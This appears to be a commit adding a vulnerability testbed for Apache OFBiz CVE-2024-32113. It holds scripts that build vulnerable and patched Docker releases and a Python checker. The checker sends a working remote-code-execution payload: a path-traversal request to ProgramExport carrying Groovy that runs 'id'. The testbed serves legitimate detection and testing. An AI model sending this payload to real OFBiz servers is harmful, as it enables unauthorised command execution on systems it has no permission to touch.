Add testbed for OFBiz CVE-2024-32113

PiperOrigin-RevId: 715535545
Change-Id: I87817ad47eeea29a9368f1b43c37c92e049b00c0

apache/ofbiz/cve-2024-32113/README.md

@@ -0,0 +1,30 @@
+# CVE-2024-32113
+
+## Vulnerable Release
+
+To create a vulnerable release, run `make_vulnerable.sh`. This will create a
+directory `vulnerable-ofbiz` containing ofbiz-framework release 18.12.12 and a
+docker image `ofbiz-docker-vulnerable` and start running the docker image on
+port 8443.
+
+## Patched Release
+
+To create a patched release, run `make_patched.sh`. This will create a directory
+`patched-ofbiz` containing ofbiz-framework release 18.12.13 and a docker image
+`ofbiz-docker-patched` and start running the docker image on port 8443.
+
+## Testing CVE-2024-32113
+
+With a vulnerable release running on port 8443 of your local machine, run
+`check_vulnerability.py` and it should display:
+
+```
+OFBIZ Instance at https://localhost:8443. is vulnerable to CVE-2024-32113.
+```
+
+With a patched release running on port 8443 of your local machine, run
+`check_vulnerability.py` and it should display:
+
+```
+Vulnerability not detected in https://localhost:8443.
+```

apache/ofbiz/cve-2024-32113/check_vulnerability.py

@@ -0,0 +1,38 @@
+#!/usr/bin/env python3
+"""Checks if an OFBIZ instance at localhost:8443 is vulnerable to CVE-2024-32113."""
+
+import re
+import requests
+import urllib3
+
+TARGET = 'https://localhost:8443'
+
+
+def TestIsVulnerable(target):
+  """Tests if an OFBIZ instance at the given target is vulnerable to CVE-2024-32113.
+
+  Args:
+      target: The target URL of the OFBIZ instance.
+  """
+  url = f'{target}/webtools/control/forgotPassword/foo/../ProgramExport'
+  headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+  data = {'groovyProgram': "throw new Exception('id'.execute().text);"}
+
+  response = requests.post(url, headers=headers, data=data, verify=False)
+  match = re.search(
+      r'java\.lang\.Exception:(\s*uid=.* gid=.* groups=.*)', response.text
+  )
+
+  if match:
+    print(f'OFBIZ Instance at {target} is vulnerable to CVE-2024-32113.')
+  else:
+    print(f'Vulnerability not detected in {target}.')
+
+
+def main():
+  urllib3.disable_warnings()
+  TestIsVulnerable(TARGET)
+
+
+if __name__ == '__main__':
+  main()

apache/ofbiz/cve-2024-32113/make_patched.sh

@@ -0,0 +1,15 @@
+#!/bin/bash
+set -e
+
+echo "Cloning ofbiz-framework"
+git clone https://github.com/apache/ofbiz-framework.git patched-ofbiz
+
+echo "Checking out a patched release"
+cd patched-ofbiz
+git checkout release18.12.13
+
+echo "Building a docker image from the patched release"
+sudo docker build --tag ofbiz-docker-vuln .
+
+echo "Running the docker image"
+sudo docker run -it  --name ofbiz-docker-patched -p 8443:8443 ofbiz-docker-vuln

apache/ofbiz/cve-2024-32113/make_vulnerable.sh

@@ -0,0 +1,15 @@
+#!/bin/bash
+set -e
+
+echo "Cloning ofbiz-framework"
+git clone https://github.com/apache/ofbiz-framework.git vulnerable-ofbiz
+
+echo "Checking out a vulnerable release"
+cd vulnerable-ofbiz
+git checkout release18.12.12
+
+echo "Building a docker image from the vulnerable release"
+sudo docker build --tag ofbiz-docker-vuln .
+
+echo "Running the docker image"
+sudo docker run -it  --name ofbiz-docker-vulnerable -p 8443:8443 ofbiz-docker-vuln